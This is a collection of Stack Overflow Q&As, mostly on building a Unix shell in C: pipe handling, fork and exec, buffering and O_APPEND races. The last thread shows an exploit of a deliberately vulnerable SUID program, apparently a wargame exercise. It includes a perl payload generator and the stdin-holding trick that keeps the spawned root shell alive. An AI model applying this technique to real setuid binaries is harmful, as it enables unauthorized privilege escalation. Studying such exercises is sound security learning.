Here's my code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <wait.h>
#include <readline/readline.h>
#define NUMPIPES 2
int main(int argc, char *argv[]) {
char *bBuffer, *sPtr, *aPtr = NULL, *pipeComms[NUMPIPES], *cmdArgs[10];
int fdPipe[2], pCount, aCount, i, status, lPids[NUMPIPES];
pid_t pid;
pipe(fdPipe);
while(1) {
bBuffer = readline("Shell> ");
if(!strcasecmp(bBuffer, "exit")) {
return 0;
}
sPtr = bBuffer;
pCount = -1;
do {
aPtr = strsep(&sPtr, "|");
pipeComms[++pCount] = aPtr;
} while(aPtr);
for(i = 0; i < pCount; i++) {
aCount = -1;
do {
aPtr = strsep(&pipeComms[i], " ");
cmdArgs[++aCount] = aPtr;
} while(aPtr);
cmdArgs[aCount] = 0;
if(strlen(cmdArgs[0]) > 0) {
pid = fork();
if(pid == 0) {
if(i == 0) {
close(fdPipe[0]);
dup2(fdPipe[1], STDOUT_FILENO);
close(fdPipe[1]);
} else if(i == 1) {
close(fdPipe[1]);
dup2(fdPipe[0], STDIN_FILENO);
close(fdPipe[0]);
}
execvp(cmdArgs[0], cmdArgs);
exit(1);
} else {
lPids[i] = pid;
/*waitpid(pid, &status, 0);
if(WIFEXITED(status)) {
printf("[%d] TERMINATED (Status: %d)\n",
pid, WEXITSTATUS(status));
}*/
}
}
}
for(i = 0; i < pCount; i++) {
waitpid(lPids[i], &status, 0);
if(WIFEXITED(status)) {
printf("[%d] TERMINATED (Status: %d)\n",
lPids[i], WEXITSTATUS(status));
}
}
}
return 0;
}
(The code was updated to reflect he changes proposed by two answers below, it still doesn't work as it should...)
Here's the test case where this fails:
nazgulled ~/Projects/SO/G08 $ ls -l
total 8
-rwxr-xr-x 1 nazgulled nazgulled 7181 2009-05-27 17:44 a.out
-rwxr-xr-x 1 nazgulled nazgulled 754 2009-05-27 01:42 data.h
-rwxr-xr-x 1 nazgulled nazgulled 1305 2009-05-27 17:50 main.c
-rwxr-xr-x 1 nazgulled nazgulled 320 2009-05-27 01:42 makefile
-rwxr-xr-x 1 nazgulled nazgulled 14408 2009-05-27 17:21 prog
-rwxr-xr-x 1 nazgulled nazgulled 9276 2009-05-27 17:21 prog.c
-rwxr-xr-x 1 nazgulled nazgulled 10496 2009-05-27 17:21 prog.o
-rwxr-xr-x 1 nazgulled nazgulled 16 2009-05-27 17:19 test
nazgulled ~/Projects/SO/G08 $ ./a.out
Shell> ls -l|grep prog
[4804] TERMINATED (Status: 0)
-rwxr-xr-x 1 nazgulled nazgulled 14408 2009-05-27 17:21 prog
-rwxr-xr-x 1 nazgulled nazgulled 9276 2009-05-27 17:21 prog.c
-rwxr-xr-x 1 nazgulled nazgulled 10496 2009-05-27 17:21 prog.o
The problem is that I should return to my shell after that, I should see "Shell> " waiting for more input. You can also notice that you don't see a message similar to "[4804] TERMINATED (Status: 0)" (but with a different pid), which means the second process didn't terminate.
I think it has something to do with grep, because this works:
nazgulled ~/Projects/SO/G08 $ ./a.out
Shell> echo q|sudo fdisk /dev/sda
[4838] TERMINATED (Status: 0)
The number of cylinders for this disk is set to 1305.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)
Command (m for help):
[4839] TERMINATED (Status: 0)
You can easily see two "terminate" messages...
So, what's wrong with my code?
Even after the first command of your pipeline exits (and thust closes stdout=~fdPipe[1]), the parent still has fdPipe[1] open.
Thus, the second command of the pipeline has a stdin=~fdPipe[0] that never gets an EOF, because the other endpoint of the pipe is still open.
You need to create a new pipe(fdPipe) for each |, and make sure to close both endpoints in the parent; i.e.
for cmd in cmds
if there is a next cmd
pipe(new_fds)
fork
if child
if there is a previous cmd
dup2(old_fds[0], 0)
close(old_fds[0])
close(old_fds[1])
if there is a next cmd
close(new_fds[0])
dup2(new_fds[1], 1)
close(new_fds[1])
exec cmd || die
else
if there is a previous cmd
close(old_fds[0])
close(old_fds[1])
if there is a next cmd
old_fds = new_fds
if there are multiple cmds
close(old_fds[0])
close(old_fds[1])
Also, to be safer, you should handle the case of fdPipe and {STDIN_FILENO,STDOUT_FILENO} overlapping before performing any of the close and dup2 operations. This may happen if somebody has managed to start your shell with stdin or stdout closed, and will result in great confusion with the code here.
Edit
fdPipe1 fdPipe3
v v
cmd1 | cmd2 | cmd3 | cmd4 | cmd5
^ ^
fdPipe2 fdPipe4
In addition to making sure you close the pipe's endpoints in the parent, I was trying to make the point that fdPipe1, fdPipe2, etc. cannot be the same pipe().
/* suppose stdin and stdout have been closed...
* for example, if your program was started with "./a.out <&- >&-" */
close(0), close(1);
/* then the result you get back from pipe() is {0, 1} or {1, 0}, since
* fd numbers are always allocated from the lowest available */
pipe(fdPipe);
close(0);
dup2(fdPipe[0], 0);
I know you don't use close(0) in your present code, but the last paragraph is warning you to watch out for this case.
Edit
The following minimal change to your code makes it work in the specific failing case you mentioned:
## -12,6 +12,4 ##
pid_t pid;
- pipe(fdPipe);
-
while(1) {
bBuffer = readline("Shell> ");
## -29,4 +27,6 ##
} while(aPtr);
+ pipe(fdPipe);
+
for(i = 0; i < pCount; i++) {
aCount = -1;
## -72,4 +72,7 ##
}
+ close(fdPipe[0]);
+ close(fdPipe[1]);
+
for(i = 0; i < pCount; i++) {
waitpid(lPids[i], &status, 0);
This won't work for more than one command in the pipeline; for that, you'd need something like this: (untested, as you have to fix other things as well)
## -9,9 +9,7 ##
int main(int argc, char *argv[]) {
char *bBuffer, *sPtr, *aPtr = NULL, *pipeComms[NUMPIPES], *cmdArgs[10];
- int fdPipe[2], pCount, aCount, i, status, lPids[NUMPIPES];
+ int fdPipe[2], fdPipe2[2], pCount, aCount, i, status, lPids[NUMPIPES];
pid_t pid;
- pipe(fdPipe);
-
while(1) {
bBuffer = readline("Shell> ");
## -32,4 +30,7 ##
aCount = -1;
+ if (i + 1 < pCount)
+ pipe(fdPipe2);
+
do {
aPtr = strsep(&pipeComms[i], " ");
## -43,11 +44,12 ##
if(pid == 0) {
- if(i == 0) {
- close(fdPipe[0]);
+ if(i + 1 < pCount) {
+ close(fdPipe2[0]);
- dup2(fdPipe[1], STDOUT_FILENO);
+ dup2(fdPipe2[1], STDOUT_FILENO);
- close(fdPipe[1]);
- } else if(i == 1) {
+ close(fdPipe2[1]);
+ }
+ if(i != 0) {
close(fdPipe[1]);
## -70,4 +72,17 ##
}
}
+
+ if (i != 0) {
+ close(fdPipe[0]);
+ close(fdPipe[1]);
+ }
+
+ fdPipe[0] = fdPipe2[0];
+ fdPipe[1] = fdPipe2[1];
+ }
+
+ if (pCount) {
+ close(fdPipe[0]);
+ close(fdPipe[1]);
}
You should have an error exit after execvp() - it will fail sometime.
exit(EXIT_FAILURE);
As #uncleo points out, the argument list must have a null pointer to indicate the end:
cmdArgs[aCount] = 0;
It is not clear to me that you let both programs run free - it appears that you require the first program in the pipeline to finish before starting the second, which is not a recipe for success if the first program blocks because the pipe is full.
Jonathan has the right idea. You rely on the first process to fork all the others. Each one has to run to completion before the next one is forked.
Instead, fork the processes in a loop like you are doing, but wait for them outside the inner loop, (at the bottom of the big loop for the shell prompt).
loop //for prompt
next prompt
loop //to fork tasks, store the pids
if pid == 0 run command
else store the pid
end loop
loop // on pids
wait
end loop
end loop
I think your forked processes will continue executing.
Try either:
Changing it to 'return execvp'
Add 'exit(1);' after execvp
One potential problem is that cmdargs may have garbage at the end of it. You're supposed to terminate that array with a null pointer before passing it to execvp().
It looks like grep is accepting STDIN, though, so that might not be causing any problems (yet).
the file descriptors from the pipe are reference counted, and incremented with each fork. for every fork, you have to issue a close on both descriptors in order to reduce the reference count to zero and allow the pipe to close. I'm guessing.
Related
I have a problem in execve-pipe process. I split a command with pipeline and sent to function one by one . I made fork , dup2 and close functions . Whole command executed but output of last command sending to terminal and readline function. For this reason readline runs the last output. For example I sent ls | wc, output: 8. error: 8 is not a command. segfault.
while (++i < nproc)
{
rdl->main_str = ft_strdup(rdl->pipe_str[i]);
rdl->len = ft_strlen(rdl->pipe_str[i]);
parser(rdl);
command(rdl); // => run a pipe_exec function
token_clear(&rdl->token);
free(rdl->main_str);
printf("*****************\n");
}
while (nproc-- > 0)
waitpid(-1, 0, 0);
#define READ 0
#define WRITE 1
static void ft_fatality(void)
{
ft_putstr_fd("error: fatal\n", 2);
exit(1);
}
// static void ft_exec_error(char *str)
// {
// ft_putstr_fd("error: cannot execute ", 2);
// ft_putstr_fd(str, 2);
// ft_putstr_fd("\n", 2);
// exit(1);
// }
static void ft_openpipes(int fd[2])
{
if (close(fd[READ]) == -1)
ft_fatality();
if (dup2(fd[WRITE], STDOUT_FILENO) == -1)
ft_fatality();
if (close(fd[WRITE]) == -1)
ft_fatality();
}
static void ft_closepipes(int fd[2])
{
if (dup2(fd[READ], STDIN_FILENO) == -1)
ft_fatality();
if (close(fd[READ]) == -1)
ft_fatality();
if (close(fd[WRITE]) == -1)
ft_fatality();
}
int pipe_exec(t_command command)
{
printf("pipe_exec\n");
printf("pipe_exec command count %d\n", command.count);
int i;
int j;
int fd[2];
int type_size;
int size;
int result;
char *arg;
char *path;
char **type;
pid_t pid;
i = -1;
j = 1;
result = 0;
size = token_size(command.tokens);
type_size = 0;
arg = ft_strdup("");
if (pipe(fd) == -1)
ft_fatality();
while (++i < size)
{
if (command.tokens->type_id == 12)
type_size++;
get_next_token(&command.tokens);
}
i = -1;
path = command_find_path(command.keyword);
type = (char **)malloc(sizeof(char *) * ((type_size + 1) + 2));
type[0] = ft_strdup(path);
while (++i < size)
{
if (command.tokens->type_id == 13 || command.tokens->type_id == 7)
{
arg = ft_strjoin(arg, command.tokens->context);
printf("arg %s\n", arg);
}
if (command.tokens->type_id == 12 || size - 1 == command.tokens->id)
{
type[j++] = ft_strdup(arg);
arg = ft_strdup("");
}
get_next_token(&command.tokens);
}
type[j] = NULL;
j = -1;
while (type[++j])
{
printf("type : %s\n", type[j]);
}
pid = fork();
// signal(SIGINT, proc_signal_handler);
if (pid < 0)
return (-1);
if (pid == 0)
{
ft_openpipes(fd);
result = execve(path, type, g_env.env);
}
else
ft_closepipes(fd);
if (result == -1)
return (1);
waitpid(pid, 0, 0);
command.fd[0] = fd[0];
command.fd[1] = fd[1];
free(arg);
ft_free_dbl_str(type);
free(path);
return (0);
}
bash % ./minishell
->ls | wc -l
-------------------
ls token->type->context keyword token->type->id 0 token->t_flag 0
| token->type->context pipe token->type->id 6 token->t_flag 6
wc token->type->context keyword token->type->id 0 token->t_flag 0
l token->type->context arg token->type->id 13 token->t_flag -1
-------------------
-------------------
ls token->type->context keyword token->type->id 0 token->t_flag 0
-------------------
pipe_exec
pipe_exec command count 1
type : /bin/ls
*****************
-------------------
wc token->type->context keyword token->type->id 0 token->t_flag 0
- token->type->context option token->type->id 7 token->t_flag 5
l token->type->context arg token->type->id 13 token->t_flag -1
-------------------
pipe_exec
pipe_exec command count 2
arg -
arg -l
type : /usr/bin/wc
type : -l
*****************
-> 8
-------------------
8 token->type->context string token->type->id 12 token->t_flag -1
token->type->context string token->type->id 12 token->t_flag -1
-------------------
**bash: 8: command not found
->zsh: segmentation fault ./minishell**
Your ft_closepipes() function dupes the read end of the pipe onto STDIN_FILENO. You execute that in the parent process, which causes exactly the effect you describe. The parent's standard input is redirected to the read end of the (current) pipe.
That happens to work out ok for the processes in the pipeline (but see below), because they each inherit their standard input from their parent, and you start them in order from left to right. But it leaves the shell itself consuming the output of the last process as its own input.
And that brings up the other point: your ft_openpipes() function redirects the caller's standard output to the specified pipe, but you don't want to do that for the last process in the pipeline. It was a bit fortuitous to combine that error with the other, however, because it made very clear what the nature of the problem is.
For the parent, one alternative would be to dupe the standard input FD before setting up the pipeline, to preserve it, then dupe it back afterward. That would be a relatively easy retrofit, but I think it's poor form. Although you would need more of a rework to accomplish it, better would be to avoid ever redirecting the parent's file descriptors at all.
As for the segfault, that's probably a result of the child process returning to the caller of pipe_exec() in the event that its execve() call returns. It ought instead to terminate, just as would (eventually) happen if it had successfully started the the requested program. Personally, I would go with something like this:
// ...
result = execve(path, type, g_env.env);
assert(result == -1);
perror(path);
_exit(EXIT_FAILURE);
I am writing my own shell. I am facing a problem with the commands like C1 | C2 > file or C1 | C2 >> file. When I execute a command like ls | grep .c > a.txt , I get the result of ls | grep only when I terminate the program. But I want to get it during the execution.
Code from main.c:
if (countPipes == 1 && strstr(userInput, ">>") != NULL){
token = NULL;
resetC(cmd);
resetC(cmdPipe);
token = strtok(userInput, ">>");
char *piped = strdup(token);
token = strtok(NULL, ">>");
char *file = strdup(token);
file = skipwhite(file);
token = strtok(piped, "|");
c1 = strdup(token);
token = strtok(NULL, "|");
c2 = strdup(token);
c2 = skipwhite(c2);
splitCommands(c1, cmd);
splitCommands(c2, cmdPipe);
execPipedCommandsRed(cmd, cmdPipe, file);
memset(userInput, '\0', 1000);
}
Code from functions.c:
void execPipedCommandsRed(char **cmd, char **cmdPiped, char *file){
int pipeOne[2], status, ret_val, s;
status = pipe(pipeOne);
if (status < 0) {
exit(-1);
}
int k;
int e = dup(1);
pid_t p1, p2, w;
int s2 = dup(1);
p1 = fork();
if (p1 < 0) {
printf("Fork failed!\n");
}
if (p1 == 0) {
close(pipeOne[READ]);
dup2(pipeOne[WRITE], STDOUT_FILENO);
close(pipeOne[WRITE]);
if (execvp(cmd[0], cmd) < 0) {
perror("Lathos");
}
} else {
p2 = fork();
if (p2 < 0) {
printf("Fork failed\n");
}
if (p2 == 0) {
close(pipeOne[WRITE]);
dup2(pipeOne[READ], STDIN_FILENO);
close(pipeOne[READ]);
k = open(file, O_WRONLY| O_APPEND | O_CREAT, 0644);
if (k < 0) {
puts("error k");
}
dup2(k, 1);
close(k);
if (execvp(cmdPiped[0], cmdPiped) < 0) {
perror("Lathos!");
}
} else {
// parent is waiting
waitpid(-1, &s, WUNTRACED | WCONTINUED);
printBash();
}
}
}
When i execute a command like ls | grep .c > a.txt, i get the result of ls | grep only when i terminate the program.
The traditional POSIX shell behaviour is that stdout is line-buffered only when it goes into a terminal (isatty returns 1), otherwise it is block-buffered. See setvbuf for buffering descriptions.
If you'd like matching files to be output into stdout as they are found, instead of ls | grep .c > a.txt use the following command:
stdbuf --output=L find -maxdepth 1 -name "*.c" > a.txt
stdbuf allows to explicitly specify the desired buffering mode. And find outputs one filename per-line, unlike plain ls.
You can do ls and grep, but that is sub-optimal in the number of processes involved and that each process must have its output buffering specified explicitly:
stdbuf --output=L ls -1 | stdbuf --output=L egrep '\.c$' > a.txt
Notes:
stdbuf only affects C standard streams and some heavily optimised applications may not use C standard streams at all, so that stdbuf may have no effect.
grep .c matches anything that has character c at non-0 position. Whereas find -name "*.c" matches only files with extension .c. So does egrep '\.c$'.
ls outputs multiple files per line, but grep filtering expects one file per line. ls -1 outputs one file per line.
So I was required to solve this exercise:
This exercise is designed to demonstrate why the atomicity guaranteed by opening a file with the O_APPEND flag is necessary. Write a program that takes up to three command-line arguments:
$ atomic_append filename num-bytes [x]
This file should open the specified filename (creating it if necessary) and append num-bytes bytes to the file by using write() to write a byte at a time. By default, the program should open the file with the O_APPEND flag, but if a third command-line argument (x) is supplied, then the O_APPEND flag should be omitted, and instead the program should perform an lseek(fd, 0, SEEK_END) call before each write(). Run two instances of this program at the same time without the x argument to write 1 million bytes to the same file:
$ atomic_append f1 1000000 & atomic_append f1 1000000
Repeat the same steps, writing to a different file, but this time specifying the x argument:
$ atomic_append f2 1000000 x & atomic_append f2 1000000 x
List the sizes of the files f1 and f2 using ls –l and explain the difference.
So this is what I wrote:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char *argv[]) {
int fd, flags, num_bytes;
if (argc < 3 || strcmp(argv[1], "--help") == 0) {
printf("Usage: %s filename num-bytes [x]\n", argv[0]);
return 1;
}
num_bytes = atoi(argv[2]);
if (argc == 4 && strcmp(argv[3], "x") == 0) {
fd = open(argv[1], O_CREAT | O_WRONLY, 0666);
if (fd == -1)
perror("open");
while (num_bytes-- > 0) {
lseek(fd, 0, SEEK_END);
write(fd, "a", 1);
}
if (close(fd) == -1)
perror("close");
}
else {
fd = open(argv[1], O_CREAT | O_APPEND | O_WRONLY, 0666);
if (fd == -1)
perror("open");
while(num_bytes-- > 0)
write(fd, "a", 1);
if (close(fd) == -1)
perror("close");
}
return 0;
}
Now after I ran it as required:
abhinav#cr33p:~/System/5$ ./a.out f1 1000000 & ./a.out f1 1000000
[1] 4335
[1]+ Done ./a.out f1 1000000
abhinav#cr33p:~/System/5$ ./a.out f2 1000000 x & ./a.out f2 1000000 x
[1] 4352
[1]+ Done ./a.out f2 1000000 x
abhinav#cr33p:~/System/5$ ls f1 f2
f1 f2
abhinav#cr33p:~/System/5$ ls -l f*
-rw-rw-r-- 1 abhinav abhinav 2000000 Dec 10 16:23 f1
-rw-rw-r-- 1 abhinav abhinav 1000593 Dec 10 16:24 f2
Definitely, there is a difference in file sizes I am somewhat unable to clearly understand why? I searched and found somewhere this explanation:
The sizes were definitely different:
-rw------- 1 posborne posborne 1272426 2012-01-15 21:31 test2.txt
-rw------- 1 posborne posborne 2000000 2012-01-15 21:29 test.txt
Where test2.txt was run without O_APPEND. test2.txt is short by the
number of times (or bytes as a result of times) that seeking to the
end of the file did not happen at the same time as the write (quite
frequently).
But it does not seem to make any sense. So why the difference in sizes?
This code, run on a file not opened with O_APPEND:
while (num_bytes-- > 0) {
lseek(fd, 0, SEEK_END);
write(fd, "a", 1);
writes to the location of the end of the file as it was when the call to lseek() was made. The end of the file can change in the time between the lseek() and write() call.
This code, on a file that was opened with O_APPEND:
while(num_bytes-- > 0)
write(fd, "a", 1);
is guaranteed by the standard behavior of write()'ing to a file opened with O_APPEND to write to the end of the file no matter where that end is.
That's the entire point of the O_APPEND flag - lseek() then write() doesn't work.
I am having an issue that is just seeming to slip past my knowledge. I am writing a simple shell to learn some systems programming for an internship coming up with Unisys. In my shell, it seems that all of the commands I am trying are working besides the ls and even now discovering the wc command. ls and wc works when I type it by itself, but if I give it arguments, it will fail to work and give me an error saying No such file or directory.
here is my code:
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#define BUF_SIZE 1024
#define DELIMS " -\r\t\n"
/****************************************************************
* Capture input from the user. Returns the input from the
* standard input file descriptor.
***************************************************************/
char * getInput (char **buffer, size_t buflen)
{
size_t bufsize = BUF_SIZE;
*buffer = malloc(sizeof(char) * bufsize + 1); // allocate space for the buffer
if (!*buffer)
{
fprintf(stderr, "Shell: buffer allocation error\n");
exit(EXIT_FAILURE);
}
printf("$$ ");
fflush(NULL);
int bytesRead = getline(&(*buffer), &bufsize, stdin);
if (bytesRead < 0)
{
printf("Getline error\n");
exit(EXIT_FAILURE);
}
return *buffer; // Not capturing return value right now
}
/****************************************************************
* Tokenize the buffer input from stdin
***************************************************************/
char ** splitLine(char *line)
{
int bufsize = BUF_SIZE;
int pos = 0;
char **tokens = malloc (sizeof(char) * BUF_SIZE + 1);
char *token;
if (!tokens)
{
fprintf(stderr, "Shell: buffer allocation error\n");
exit(EXIT_FAILURE);
}
/* Tokenize the line */
token = strtok(line, DELIMS);
while (token != NULL)
{
tokens[pos] = token;
pos++;
if (pos > bufsize)
{
bufsize += BUF_SIZE;
tokens = realloc(tokens, bufsize * sizeof(char) + 1);
if (!tokens)
{
fprintf(stderr, "Shell: buffer allocation error\n");
exit(EXIT_FAILURE);
}
}
token = strtok(NULL, DELIMS); // continue grabbing tokens
}
tokens[pos] = NULL;
return tokens;
}
/****************************************************************
* Main function
***************************************************************/
int main (int argc, char **argv)
{
char *buf; // buffer to hold user input from standard input stream.
pid_t pid; // Parent id of the current process
int status;
/* Loop while the user is getting input */
while (getInput(&buf, sizeof(buf)))
{
char **args = splitLine(buf);
int i = 0;
/* Print tokens just to check if we are processing them correctly */
while (1)
{
char *token = args[i++];
if (token != NULL)
printf("Token #%d: %s\n", i, token);
else
break;
}
fflush(NULL);
/* Fork and execute command in the shell */
pid = fork();
switch(pid)
{
case -1:
{
/* Failed to fork */
fprintf(stderr, "Shell cannot fork: %s\n", strerror(errno));
continue;
}
case 0:
{
/* Child so run the command */
execvp(args[0], args); // Should not ever return otherwise there was an error
fprintf(stderr, "Shell: couldn't execute %s: %s\n ", buf, strerror(errno));
exit(EX_DATAERR);
}
}
/* Suspend execution of calling process until receiving a status message from the child process
or a signal is received. On return of waitpid, status contains the termination
information about the process that exited. The pid parameter specifies the set of child
process for which to wait for */
if ((pid = waitpid(pid, &status, 0) < 0))
{
fprintf(stderr, "Shell: waitpid error: %s\n", strerror(errno));
}
free(args);
}
free(buf);
exit(EX_OK);
}
For example, I have tried the following commands with output:
ls -la (THE ISSUE)
$$ ls -la
Token #1: ls
Token #2: la
ls: la: No such file or directory
$$
wc -l (THE ISSUE)
$$ wc -l
Token #1: wc
Token #2: l
wc: l: open: No such file or directory
ls
$$ ls
Token #1: ls
Makefile driver driver.dSYM main.c main.o
$$
ps -la
$$ ps -la
Token #1: ps
Token #2: la
UID PID PPID CPU PRI NI VSZ RSS WCHAN STAT TT TIME COMMAND
0 2843 2405 0 31 0 2471528 8 - Us s000 0:00.08 login
501 2845 2843 0 31 0 2463080 1268 - S s000 0:01.08 -bash
501 4549 2845 0 31 0 2454268 716 - S+ s000 0:00.01 ./driv
0 4570 4549 0 31 0 2435020 932 - R+ s000 0:00.00 ps la
$$
which which
$$ which which
Token #1: which
Token #2: which
/usr/bin/which
which -a which
$$ which -a which
Token #1: which
Token #2: a
Token #3: which
/usr/bin/which
and even finally man getline
GETLINE(3) BSD Library Functions Manual GETLINE(3)
NAME
getdelim, getline -- get a line from a stream
LIBRARY
Standard C Library (libc, -lc)
.
.
.
Can anybody help me point out why I am having this issue?
Youve added "-" as a word seperator in the DELIMS macro.
Removing it should fix your problem.
As an aside, its probably best to avoid macros where you can do so easily. Here, I would have used a const char* delims to store the separators. I usually find it easier to declare a variable close to where its used - I think that makes it easier to spot bugs and read the code.
I am trying to exploit a SUID program.
The program is:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }
void print(unsigned char *buf, int len)
{
int i;
printf("[ ");
for(i=0; i < len; i++) printf("%x ", buf[i]);
printf(" ]\n");
}
int main()
{
unsigned char buf[512];
unsigned char *ptr = buf + (sizeof(buf)/2);
unsigned int x;
while((x = getchar()) != EOF) {
switch(x) {
case '\n': print(buf, sizeof(buf)); continue; break;
case '\\': ptr--; break;
default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
}
}
printf("All done\n");
}
We can easily see that if we somehow change ptr's contents to some address that starts with CA then a new shell will be spawned for us. And as ptr normally holds some address starting with FF the way to decrease it(ptr) is to enter \ character. So I make a file with 0x35000000 '\' characters, and finally 3 'a' at the end of the file
perl -e "print '\\\'x889192448" > file # decimal equivalent of 0x35000000
echo aaa > file # So that e() is called which actually spawns the shell
And finally in gdb,
run < file
However instead of spawning a shell gdb is saying
process <some number> is executing new program /bin/dash
inferior 1 exited normally
And then back to gdb prompt instead of getting a shell.
I have confirmed by setting breakpoints at appropriate locations that ptr is indeed starting with CA before setresuid() gets called.
Also if I pipe this outside of gdb, nothing happens.
./vulnProg < file
Bash prompt returns back.
Please tell me where am I making mistake.
You can see the problem by compiling a simpler test program
int main() { execlp("/bin/sed", "-e", "s/^/XXX:/", NULL); }
All this does is start a version of sed (rather than the shell) and converts input by prepending "XXX:".
If you run the resulting program, and type in the Terminal you get behaviour like this:
$./a.out
Hello
XXX:Hello
Test
XXX:Test
^D
Which is exactly as we'd expect.
Now if you feed it input from a file containing "Hello\nWorld" you get
$./a.out < file
XXX:Hello
XXX:World
$
And the application exits immediately, with the input stream to the application being closed when the input file has all been read.
If you want to provide additional input, you need to use a trick to not break the input stream.
{ cat file ; cat - ; } | ./a.out
This will put all the input from file into a running ./a.out and then
read from stdin and add that too.
$ { cat file ; cat - ; } | ./a.out
XXX:Hello
XXX:World
This is a Test
XXX:This is a Test